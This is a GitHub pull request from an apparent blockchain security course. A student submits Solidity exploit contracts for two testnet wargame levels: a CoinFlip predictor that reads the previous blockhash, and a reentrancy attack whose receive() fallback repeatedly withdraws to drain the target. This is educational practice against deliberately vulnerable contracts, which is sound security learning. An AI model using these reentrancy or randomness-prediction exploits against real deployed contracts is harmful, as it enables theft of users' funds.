Skip to content
This repository has been archived by the owner on Oct 29, 2023. It is now read-only.

Homework Session 3 #13

Open
wants to merge 6 commits into
base: session-1-assignments
Choose a base branch
from
Open

Homework Session 3 #13

wants to merge 6 commits into from

Conversation

aldrinmayen
Copy link

@aldrinmayen aldrinmayen commented Apr 24, 2023
edited
Loading

wallet: 0x98c074DD95aA3607dBA6cBaFbAb68b6FF83180f0
tesnet: goerli
instance: 0xdb2f9d5ce80f0a19e2bb4d686dbf42f252ebc139
vulnerability: i believe is the blockchash since it is random number, the factor and number.block are known
Attack vector : re-entrancy contract
code:

pragma solidity ^0.8.0;
  import './CoinFlip.sol';
  
  contract flipExploit {
      CoinFlip public exploitedInstance;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
  
    constructor (address _exploitedContractAddress) {
      exploitedInstance = CoinFlip( _exploitedContractAddress);
  
      }
// this function will calculate the guess and if so it will run the original contract 

    function flipAhead() public {
        uint256 blockValue = uint256(blockhash(block.number - 1));
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;
        exploitedInstance.flip(side); //this. will run the specific instance with the flip function using the side value
    }
  
  }

Screenshot 2023-04-23 at 8 47 36 PM

@aldrinmayen
Copy link
Author

aldrinmayen commented May 5, 2023
edited
Loading

Homework Reentrancy -
wallet 0x98c074DD95aA3607dBA6cBaFbAb68b6FF83180f0
instance 0x4D0328Aad884F4c24e36fA071ea52034B54899c2
testnet: sepolia
NOTES: this amazed me to review and see the history of what happened with the solution, since it seems that the network was not immutable and make changes and created an Ethereum fork. It could be very probable that another change may happened that won't be decentralized nor immutable however to support security, i guess the trilemma still difficult to resolve
https://www.gemini.com/cryptopedia/the-dao-hack-makerdao#section-the-dao-hack-remedy-forks-ethereum

    constructor(address _victim) {
        reentrance = INReentrance(_victim);    
    }

    function vmattack() external payable {
        reentrance.donate{value: msg.value}(address(this));

        reentrance.withdraw(msg.value);
    }

    receive() external payable {
        uint targetBalance = address(reentrance).balance;

        if (targetBalance >= 0.001 ether) {
            reentrance.withdraw(0.001 ether);
        }
    }
}

Screenshot 2023-05-04 at 9 52 28 PM

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@aldrinmayen @Robert-H-Leonard @thor4